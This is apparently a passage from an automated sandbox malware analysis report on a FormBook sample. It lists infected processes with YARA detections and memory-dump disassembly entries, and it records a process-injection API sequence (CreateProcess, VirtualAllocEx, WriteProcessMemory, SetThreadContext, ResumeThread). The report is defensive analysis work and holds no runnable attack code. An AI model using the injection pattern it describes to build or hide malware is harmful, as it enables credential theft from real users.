                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:21
                                      Start time:04:20:28
                                      Start date:10/06/2024
                                      Path:C:\Windows\SysWOW64\write.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\write.exe"
                                      Imagebase:0x600000
                                      File size:10'240 bytes
                                      MD5 hash:3D6FDBA2878656FA9ECB81F6ECE45703
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Reputation:moderate
                                      Has exited:false

                                      Target ID:22
                                      Start time:04:20:41
                                      Start date:10/06/2024
                                      Path:C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe"
                                      Imagebase:0x870000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      Target ID:25
                                      Start time:04:20:52
                                      Start date:10/06/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff79f9e0000
                                      File size:676'768 bytes
                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true


                                        Execution Graph

                                        Execution Coverage:10.4%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:1.4%
                                        Total number of Nodes:214
                                        Total number of Limit Nodes:9

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q$$]q$$]q$a"9
                                        • API String ID: 0-3129253312
                                        • Opcode ID: 896177a19ecea1ff50f8f312fd57440c79fd576b0ad1bf9fb57d02c103f25543
                                        • Instruction ID: 1a28745a39d1fbc9c41d9897cc087c16939dec69323e97f74f45035f2ad920b4
                                        • Opcode Fuzzy Hash: 896177a19ecea1ff50f8f312fd57440c79fd576b0ad1bf9fb57d02c103f25543
                                        • Instruction Fuzzy Hash: C522F5B4E05219CFDB58CFA9D98479DBBB2FB89340F10D4AAD50AA7258D7309E81CF14

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q$f
                                        • API String ID: 0-3013327057
                                        • Opcode ID: a1846580a42fa5c3c3dfffd7320db7526ec0eff90168ab730e6e470619a7bd55
                                        • Instruction ID: fd24493f58c1a3b25bdfcb7f2b58ffe91df8a25785379bfe364ba2c271cc774d
                                        • Opcode Fuzzy Hash: a1846580a42fa5c3c3dfffd7320db7526ec0eff90168ab730e6e470619a7bd55
                                        • Instruction Fuzzy Hash: E8B15BB5E056898FCB04CFE9D884AEDBBF2FF89350F14806AD815AB255D7309942CF94

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: 28636147ac6e4d388c34c3407a9b9f377d6065a1726fb77936102639e3289caa
                                        • Instruction ID: 060fabec8b8c0f73d398a910895d4c22e38d30feb55b139e334aba9a69af607c
                                        • Opcode Fuzzy Hash: 28636147ac6e4d388c34c3407a9b9f377d6065a1726fb77936102639e3289caa
                                        • Instruction Fuzzy Hash: 8991F5B5E052498FCB08CFA9C984ADDFBF2FF89310F14802AD919AB264D7349906CF54

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: IJfl$IJfl
                                        • API String ID: 0-1673969182
                                        • Opcode ID: c638b1b6107c3f48742b4ed61224e217b715776c94c2369de58539bac516d0e3
                                        • Instruction ID: 49625f93f4840a59db323c33a5314a61034c38d1212301c97cdcfe2288e65870
                                        • Opcode Fuzzy Hash: c638b1b6107c3f48742b4ed61224e217b715776c94c2369de58539bac516d0e3
                                        • Instruction Fuzzy Hash: 5091E272E0520DEFCB18CFA6E5845EEFBF2AF89310F14942AE425AB224D7309556CF14

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: c525d08dd5c12a7a95316ae67ba7275d5c778c6190587e26db52a0a3c3e553c4
                                        • Instruction ID: 4a8e79a662f5d6c9c36a7247a59da6cf2f73ae424c0662fd1091d23868a48166
                                        • Opcode Fuzzy Hash: c525d08dd5c12a7a95316ae67ba7275d5c778c6190587e26db52a0a3c3e553c4
                                        • Instruction Fuzzy Hash: DEA1E474E00219CFDB64DFA5C958B9DBBB2FB89340F2084AAD50AA7758D7309E81CF14

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 6639cba4d9a4a46221b9c8bc4a7a3a7906559bbaeb7514685f7589b4ffc043f0
                                        • Instruction ID: 13f38ee538669846a07a83486c59f0660a304091f667639961c33a849c4823d6
                                        • Opcode Fuzzy Hash: 6639cba4d9a4a46221b9c8bc4a7a3a7906559bbaeb7514685f7589b4ffc043f0
                                        • Instruction Fuzzy Hash: F4A1D574E00219CFDB64DFA5D954B9DBBB2FB89340F2084AAD50AA7758D7309E81CF14

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Te]q$Te]q
                                        • API String ID: 0-3320153681
                                        • Opcode ID: e4fc8262052bf3f19116da948b1324206d104360699f627cd0b5d364dd3e219e
                                        • Instruction ID: c52aa54688802381fb7a074a2e6f0feb707b6c827476aae5dbe01342c0067a4e
                                        • Opcode Fuzzy Hash: e4fc8262052bf3f19116da948b1324206d104360699f627cd0b5d364dd3e219e
                                        • Instruction Fuzzy Hash: 7A81C3B4E012199FDB08CFA9C984ADEFBB2FF89300F14842AD919AB364D7345905CF54

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: $]q$$]q
                                        • API String ID: 0-127220927
                                        • Opcode ID: 698f6865981dab71d8089261c4a7d6823d9ed88379d31155744bdd8fb5f9783e
                                        • Instruction ID: 57a59596377a03bddedaa3a2f48c4246fb486e12028a5c529dabe4f08eb1cca7
                                        • Opcode Fuzzy Hash: 698f6865981dab71d8089261c4a7d6823d9ed88379d31155744bdd8fb5f9783e
                                        • Instruction Fuzzy Hash: 0291A074E00219CFDB64DFA5D954B9DBBB2FB89300F1085AAD90AA7758DB309E81CF10
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Pp]q
                                        • API String ID: 0-2528107101
                                        • Opcode ID: ac7e26a01412c03e91565142cc1a7920d12e63d98838b21fc4a7a5640db498aa
                                        • Instruction ID: d39b8475ab8cbaf4207b133106a32d04cff6656ab0c8a36be348af3b57fd9dd9
                                        • Opcode Fuzzy Hash: ac7e26a01412c03e91565142cc1a7920d12e63d98838b21fc4a7a5640db498aa
                                        • Instruction Fuzzy Hash: 0B52C234A11659CFDB54DF68C894B99B7B2FF89300F1196E9D509AB3A0DB30AE85CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Pp]q
                                        • API String ID: 0-2528107101
                                        • Opcode ID: 075c42fd6129bbf690650d4c1ac5a12913f6a5f5a86fcf9ac668ebfabf2f448f
                                        • Instruction ID: 3bfdada9f602e53ba7dfb81bc1364fc42b4c7615215f794f837b7cf05d519fd0
                                        • Opcode Fuzzy Hash: 075c42fd6129bbf690650d4c1ac5a12913f6a5f5a86fcf9ac668ebfabf2f448f
                                        • Instruction Fuzzy Hash: 0542B134A11619CFDB54DF68C894B99B7B2FF89300F1196E9D509AB3A0DB70AE85CF40
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: =x
                                        • API String ID: 0-1503528311
                                        • Opcode ID: 1b4509088620e11fda9e4f94ce67dcdc3f1ad1dbeda5a81c2da2cf4485c4cdfa
                                        • Instruction ID: 2b29c5d12fb11bd46d738f3d85296d65612e5747cb7468f44dc86d5f4a90747a
                                        • Opcode Fuzzy Hash: 1b4509088620e11fda9e4f94ce67dcdc3f1ad1dbeda5a81c2da2cf4485c4cdfa
                                        • Instruction Fuzzy Hash: A3A10671D05619EFDF28CFA6C98069EFBB2FF88301F64952AD419A7254DB749902CF40
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2121166086.000000000DC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 0DC30000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_dc30000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7712dffb18a73de64f3968626a14c83ba9c23fce713136e31d31e20dab3866f5
                                        • Instruction ID: cd456ba80ee74a9425b7c18056325b230cafcacf172a22f71199673510682ffe
                                        • Opcode Fuzzy Hash: 7712dffb18a73de64f3968626a14c83ba9c23fce713136e31d31e20dab3866f5
                                        • Instruction Fuzzy Hash: 0B327B32B012088FDB19DF69C554BAEB7FAAF89700F248469E549DB3A1CB35ED01CB51
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 195f52297059263b38dacd7b7c7f815f6b24ff204e41addce01c7aa751f5c972
                                        • Instruction ID: b22995c665c98fc7135e0ffe3b0d1ec79a24dcc7868cec563a2e0fb8e41de6a1
                                        • Opcode Fuzzy Hash: 195f52297059263b38dacd7b7c7f815f6b24ff204e41addce01c7aa751f5c972
                                        • Instruction Fuzzy Hash: 8A225C70A10219CFCB14DF68D884A9DBBB6FF89310F55C5A9E449AB225DB30ED85CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f2537bae66fdaa12db3265a89fc8e60bac40b9f83dc842e20d6d635123139427
                                        • Instruction ID: b2474e67d57de6f5da08473eb63b15726003af9533627efc3be40dfc5f8b6ed4
                                        • Opcode Fuzzy Hash: f2537bae66fdaa12db3265a89fc8e60bac40b9f83dc842e20d6d635123139427
                                        • Instruction Fuzzy Hash: BAF19DB591464ACFCB08DFA5D8844EEBBB2FF89390F14C156D411AB256D731AA82CFD0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 925d8612377ff11f726028c3ce57ab652467df7f65dbf162aa38e7f55145b38a
                                        • Instruction ID: 460a23e82d489a4a1ab9559f01f8847327ccda13b3f73adf7e757a8a931a1b07
                                        • Opcode Fuzzy Hash: 925d8612377ff11f726028c3ce57ab652467df7f65dbf162aa38e7f55145b38a
                                        • Instruction Fuzzy Hash: 70D13BB4E1520ADFCB08CF99C8808AEFBB2FF89340F14D555D415AB259D734AA82CF90
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2d75ee0d2f9546e0b75f5deb17e0790d4a4ff7083e8070a796d70e752822fa81
                                        • Instruction ID: 858ecb26deaba886859340c1bef2f7ee0ffb1f9abe9444f03451af006a0c32b9
                                        • Opcode Fuzzy Hash: 2d75ee0d2f9546e0b75f5deb17e0790d4a4ff7083e8070a796d70e752822fa81
                                        • Instruction Fuzzy Hash: 5EB10CB4E112199FCB14CFA9C5809ADFBB2BF89341F24C5AAD418A7356D7309E81CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0e970885cdff3631098343cf4ce2acf34cd783f816bcef1ade9ca8999407a23
                                        • Instruction ID: f5d0ac5cecc6b69fc3453512dd8709c1453aefe2522e653a7c4a566768cdc64a
                                        • Opcode Fuzzy Hash: a0e970885cdff3631098343cf4ce2acf34cd783f816bcef1ade9ca8999407a23
                                        • Instruction Fuzzy Hash: C64164B4E16209DFCB04CFA6D5806EEBBB2FF89240F11D56AC011B7254E7389A41CF61
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2118203573.00000000077D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_77d0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2587bcff07fb49bdb767731d11fbb22a564235d274d377eba8787985feacf908
                                        • Instruction ID: 826e66783698fd9df8415a32dc07ced2424d9ea59fd525f34434c3356cdd1325
                                        • Opcode Fuzzy Hash: 2587bcff07fb49bdb767731d11fbb22a564235d274d377eba8787985feacf908
                                        • Instruction Fuzzy Hash: 4A2126B1E006188BEB18CFAAD8443CEFBB7AFC9350F14C06AD808A6258DB341955CF90

                                        Control-flow Graph

                                        APIs
                                        • ResumeThread.KERNELBASE ref: 0A13B432
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A13B4FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Thread$ContextResumeWow64
                                        • String ID:
                                        • API String ID: 1826235168-0
                                        • Opcode ID: 59ce6d4c61c33d8740719186d665b2b39000c907395e4ffef1e78c233a0a96ba
                                        • Instruction ID: a89cbeb8908a9d334b9f2c995f557368eadf3b2cd87bdb93ef4b7247979f2da7
                                        • Opcode Fuzzy Hash: 59ce6d4c61c33d8740719186d665b2b39000c907395e4ffef1e78c233a0a96ba
                                        • Instruction Fuzzy Hash: 1B4189B2C042498FCB10DFA9C4457EEBFF4EF49314F24845AC459A7241D738A946CFA1
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A13BAD6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        APIs
                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0A13BAD6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: CreateProcess
                                        • String ID:
                                        • API String ID: 963392458-0
                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 056FB2DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        APIs
                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 05804381
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: CallProcWindow
                                        • String ID:
                                        • API String ID: 2714655100-0
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 056F5DE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 056F5DE9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2114798422.0000000005800000.00000040.00000800.00020000.00000000.sdmp, Offset: 05800000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_5800000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A13B6A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0A13B6A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessWrite
                                        • String ID:
                                        • API String ID: 3559483778-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,056FD52E,?,?,?,?,?), ref: 056FD5EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A13B788
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,056FD52E,?,?,?,?,?), ref: 056FD5EF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: DuplicateHandle
                                        • String ID:
                                        • API String ID: 3793708945-0
                                        APIs
                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0A13B788
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: MemoryProcessRead
                                        • String ID:
                                        • API String ID: 1726664587-0
                                        APIs
                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0A13B4FE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ContextThreadWow64
                                        • String ID:
                                        • API String ID: 983334009-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056FB359,00000800,00000000,00000000), ref: 056FB56A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A13B5C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0A13B5C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        APIs
                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,056FB359,00000800,00000000,00000000), ref: 056FB56A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2113921770.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_56f0000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID:
                                        • API String ID: 1029625771-0
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
                                        • API ID: ResumeThread
                                        • String ID:
                                        • API String ID: 947044025-0
                                        APIs
                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 0A13FDB5
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2120031454.000000000A130000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A130000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a130000_CFV20240600121.jbxd
                                        Similarity
